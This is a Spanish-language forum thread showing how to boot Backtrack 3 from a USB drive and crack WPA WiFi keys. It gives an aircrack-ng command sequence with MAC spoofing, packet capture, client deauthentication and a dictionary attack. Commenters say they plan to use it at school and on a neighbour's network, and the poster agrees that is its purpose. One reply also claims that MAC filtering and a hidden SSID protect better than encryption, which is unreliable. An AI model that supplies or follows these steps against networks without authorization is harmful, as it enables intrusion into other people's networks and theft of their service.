Obtener la clave WiFi con cifrados WPA gracias a Backtrack 3

[movimientourbano]

Backtrack es una de las muchas distribuciones basadas en Linux, para lo que se conoce como auditorias, en las que básicamente se pueden obtener las claves de las redes Wifi con cifrados como WEP, WPA y otros. El más fácil de conseguir es el primero (lo digo por experiencia propia) aunque el segundo (y otros) también son factibles a la hora del crackeo.

Tenéis toda la información sobre esta distribución en Remote-Exploit. Ahora mismo la versión estable que hay es la #3 aunque ya hay otra beta de la #4. Para hacer más fácil el uso de ésta herramienta podéis descargarlo/instalarlo en un simple pincho (Pendrive) de la siguiente forma:

Necesitaremos el Backtrack 3 versión USB: que descargaremos desde aquí (http://www.remote-exploit.org/backtrack_download.html)
Descomprimimos el archivo y obtenemos dos carpetas que debemos meter en la raíz del pendrive (usb flash memory). Por ejemplo e:
En Windows vamos al menu de inicio > ejecutar > cmd
Se nos abre una “terminal” de Dos en la que tendremos que navegar hasta el pendrive, en este caso tecleamos e: y pulsamos Enter.
Tecleamos: cd boot para entrar en la carpeta boot que metimos antes en e: (el pendrive). Enter. Ahora ejecutamos el archivo bootinst.bat (escribe eso y dale al Enter).
Seguimos las instrucciones y ya deberíamos tener un pendrive “bootable” con el que podremos iniciar el sistema operativo Backtrack 3 antes de arrancar Windows.

Aunque también puedes lanzarlo desde un cd-live que grabes, a mi me parece más cómoda la opción del pendrive y más fácil de llevar.

Y para la obtención de la clave, pues podemos fijarnos en uno de los cientos y cientos de vídeos que hay por la red.


Los pasos que sigue son estos:

  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger –mac 00:11:22:33:44:55 wlan0
  4. airmon-ng start wlan0
  5. airodump-ng wlan0
  6. airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0
  7. aireplay-ng -0 5 -a (bssid)wlan0
  8. aircrack-ng (filename-01.cap)-w (dictionary location)

Por favor, ten en cuenta que toda la información de este artículo es únicamente didáctica. No la utilices para dañar o molestar a alguien, utilízala con ética y bajo tu responsabilidad.

[Alexis!]

Muy groso, ahora voy a poder conectarme en el colegio

[Lé0mcít0]

una pregunta puedo sacarle la pass a mi vecino , que tiene wifi con pass ? gracias.

[Alexis!]

una pregunta puedo sacarle la pass a mi vecino , que tiene wifi con pass ? gracias.

Y si para eso es

[..:: Uniser ::..]

Qu copado 8)
otra pregunta, quién tiene es Server WiFi puede saber qu hemos entrado en su red?

[movimientourbano]

Qu copado 8)
otra pregunta, quién tiene es Server WiFi puede saber qu hemos entrado en su red?

No sabría decirte, pero si entramos con la pas nos toma como si fuéramos usuarios  directamente

[matiaz]

Habría que aclarar que si lo que buscamos es que nadie nos robe nuestra conexión, lo mejor es hacer filtrado desde mac e ip y usar un ssdi que solo los usuarios de la red conozcan.. Las claves cifradas sean de los bits que sean quedaron en la historia =)

[S.N.K.!]

estoes solo para linux??

[matiaz]

estoes solo para linux??

Si bajás el iso podés correrlo como Live CD.